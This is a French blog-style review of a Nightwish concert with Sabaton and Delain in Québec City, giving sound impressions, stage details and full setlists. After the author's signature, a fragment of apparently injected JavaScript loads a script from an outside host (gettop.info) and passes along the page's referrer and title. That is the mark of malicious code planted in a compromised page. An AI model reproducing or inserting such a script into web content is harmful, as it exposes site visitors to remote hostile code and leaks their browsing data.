Lundi le 13 avril était une journée merveilleuse auprès de beaucoup de gens. Le soleil, la chaleur et le beau temps étaient au rendez-vous. Ces éléments ont surement rendus beaucoup de gens heureux mais ce ne sont pas les seules causes à ce bonheur car le fait que Nightwish se produisait le soir même dans la vieille capitale, à joué dans l’humeur de beaucoup et ce pour le mieux. En effet, District 7 nous a présenté hier, un concert mémorable au Capitole de Québec. La tête d’affiche était bien sur Nightwish, et les groupes invités étaient Sabaton et Delain. Je vous rappelle que les billets étaient ‘’sold-out’, donc beaucoup de gens n’ont pu avoir de billets. Pour essayer de rallumer la flamme de ceux qui n’ont pu se présenter, nous allons vous faire notre critique pour que vous puissiez savoir ce qui c’est passé comme si vous y aviez été. Je vais même vous intégrer des vidéos que j’ai pris lors du spectacle pour que vous puissiez voir par vous-même le résultat de cette belle soirée.

Delain : La salle est déjà très remplie, autant au parterre qu’au balcon, et on voyait que la foule avait hâte que le spectacle commence. Le premier spectacle, sois Delain, à commencé exactement au moment indiqué sur le billet, sois 19h15. Dès les premières notes, une chose à retenue mon attention, le son était ma foi, plus qu’excellent. Je dirais même un des meilleurs sons que j’ai entendu, dans une salle et/ou théâtre intérieur, au côté du Métropolis de Montréal. L’équilibre entre les différents instruments, et le volume de ceux-ci était parfait. Le groupe néerlandais à été extrêmement bien accueillit par les fans présents. Charlotte Wessels, la chanteuse du groupe, était en pleine forme et il en était de même pour compagnons de scène. J’avais vu Delain en première partie de Sonata Artica il y a de ça quelques mois, en 2014 et j’ai trouvé que la voix de Charlotte c’est beaucoup améliorée. Elle pouvait atteindre des notes plus hautes que la dernière fois et sa voix avait moins de petits défauts. Le groupe à fait un set d’une longueur parfaite pour une première partie. Le set était composé de 7 chansons que voici :

– Mother Machine
– Get the Devil out of Me
– Army of Dolls
– Stardust
– April rain
– Not Enough
– We Are The Others
La foule à acclamée le band à plusieurs reprises au plus grand plaisir des musiciens, qui avaient vraiment l’air touchés de ce magnifique accueil. Voici un extrait de leur set d’hier, avant la chanson ‘’We Are the Others’’

Sabaton : Après une 15e de minutes, le temps de changer le set-up de la scène, c’est au tour du groupe Suédois Sabaton de prendre place sur la scène du Capitole. À voir l’accoutrement de certains fans présents, on pouvait deviner que beaucoup venaient aussi pour eux. Le moindre qu’on puisse dire, c’est que les membres du groupes sont énergiques sur scène, surtout Joakim Brodén, le chanteur et leader du groupe. Accoutré de son pantalon cargo style camouflage d’armée, sa veste anti-balle modifié avec des genres de miroir sur le devant, et ses lunettes fumées, Joakim ne cessait de courir d’un bord et de l’autre de la scène tout en chantant. Le band a souvent interagit avec la foule et il prenait même quelques poses ici et là pour parler aux spectateurs et même faire des blagues. La foule a encore une fois accueillis le band comme il se doit et ce à mainte reprises. Tellement que Joakim à repris le terme ‘’J’ai la chaire de poule’’ qu’il avait récemment apprit dans une autre tournée, qui avait eu lieu par ici dans le passé. Il à même fait allusion au hockey en disant que leur équipe de hockey est excellent mais dès qu’ils affrontent le canada, qu’ils se font botter le c**, et c’est suite à ça qu’ils ont joués leur chanson ‘’Swedish Pagans’’. Côté sonorité, le son était un peu plus fort que Delain, ce qui avait pour cause que parfois, on entendait le son ‘’gricher’’ un peu, surtout au niveau des cymbales et des aigus. Rien de majeur mais ça pouvait peut-être en distraire quelques-uns. Encore une fois le setlist du groupe était parfait. Ils ont joués un total de 10 chansons que voici:

– Ghost Division
– To Hell and Back
– Soldier of 3 Armies
– Carolus Rex
– Resis and Bite
– Swedish Pagans
– Uprising
– Night Witches
– Primo Victoria
– Metal Crüe

Ce fut la première fois que je voyais Sabaton en concert et je n’ai pas été déçus. Un petit calibrage au niveau du son aurait encore plus amplifié la qualité du set mais ça reste tout de même une très bonne prestation. Voici un extrait de leur set d’hier avec la chanson ‘’ To Hell and Back’’

Nightwish : C’est après une longue attente, après la fin du set de Sabaton, que celui de Nightwish a commencé. Le set à débuté avec des bruits un peu étranges, nous rappelant un peu la nature, ce qui n’est pas par hasard car ces sons rappellent le dernier album du groupe ‘’Endless Forms Most Beautiful’’. Après ces bruits et sons, on commençait à entendre un peu de musique de fond, des lumières allumaient la scène et un moment donné, une voix basse à commencé à réciter certaines paroles. C’est alors que le son des instruments c’est fait ressentir au maximum, que les lumières se sont allumés et que le groupe à prit place sur scène en débutant directement et en force avec ‘’Shudder Before the Beautiful’’. Le son est ma foi plus que parfait. On pouvait sentir vibrer en nous chaque coup de drum ou de basse. Chaque tremblement et son venant des différents instruments, nous donnaient des frissons. Je crois que la place parfaite pour avoir un son optimal, était à l’endroit où j’étais, sois au premier balcon. À cette place, il était facile de capter tous les sons venants des différents instruments et les assimiler pour en faire une écoute parfaite. C’était la première fois que Nightwish se présentait dans notre coin avec la nouvelle chanteuse Floor Jansen. Le moindre qu’on puisse dire, c’est qu’elle à une voix magnifique, digne des plus grands opéras. C’est dans des chansons comme ‘’Ever Dream’’ ou bien encore ‘’The Greatest Show on Earth’’ qu’on voyait qu’elle était dans sa zone de confort quand il était question d’atteindre de hautes notes. Elle le faisait sans même forcer, ça semblait si facile à la voir chanter. En parlant de la chanson ‘’Ever Dream’’, ce fut une très belle surprise que le groupe nous a offert car normalement, c’est le titre ‘’Nemo’’ qui aurait du être joué, mais ils ont préférés nous offrir ‘’Ever Dream’’ que beaucoup espéraient entendre. Parlant de belle voix, il ne faut surtout pas oublier celle de Marco Hietala, le bassiste du groupe. Dans plusieurs chansons, il prête sa voix au côté de celle de Floor et le mélange des deux est plus qu’excellent. Le band a joué beaucoup de chansons de leur dernier album. Pour ma part c’était un gros risque à prendre d’en jouer autant même si l’album n’est pas encore totalement connu par beaucoup de gens, mais au final le résultat était excellent. Je dirais même qu’avant le spectacle, certaines nouvelles chansons ne me plaisaient pas tant que ça, mais une fois après l’avoir entendu en live, ma perception vis-à-vis ces chansons à changée immédiatement. Le set-up de la scène était simple mais très efficace. Un grand ‘’flag’’ au derrière de la scène qui changeait d’image au courant de la soirée et des panneaux avec des images changeantes, derrière Tuomas, le claviériste et leader du groupe, et Emppu, le guitariste du groupe. Le micro de Marco était tenu par une genre de statue en bois, formant une personne tenant son micro, c’était très beau à voir. Encore une fois et je me répète, la foule a sue acclamer le band d’une manière ma foi répétitive mais très fortement et de bon cœur. Le groupe semblait vraiment émue et content de voir autant de réactions positives et autant de personne, même si on était un lundi soir. Le setlist de Nightwish fut raisonnable, compte fait que certaines de leurs chansons était très longues, surtout vers la fin. Au total, 17 chansons on été jouées et les voici :

– Shudder Before the Beautiful
– Yours Is an Empty Hope
– Amaranth
– She is My Sin
– Endless Forms Most Beautiful
– My Walden
– The Islander ( avec marco qui fait presque la moitié de la chanson en solo )
– Elan
– Weak Fantasy
– Storytime
– Everdreams
– I Want My Tears Back
– Stargazers
– Sleeping Sun
– The Greatest Show on Earth ( Chapitre 2, et chapitre 3 )
Rappel
– Ghost Love Score
– Last Ride of the Day.
Voici deux extraits de leur set d’hier avec les chansons ‘’Storytime’’ et ‘’I Want My Tears Back’’.


Au final, ce fut un excellent début de semaine. Les trois bands étaient énergiques, semblaient content d’être à Québec pour performer devant nous. Une salle magnifique, avec un son impeccable, tout était bien en place au Capitole de Québec pour nous offrir un spectacle à la hauteur de nos attentes. Merci encore une fois à District 7 pour nous avoir offert ce spectacle.

Sur ce, je vous souhaite une excellente journée et à une prochaine fois.

ROCK ON !

Christopher Drouin !s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;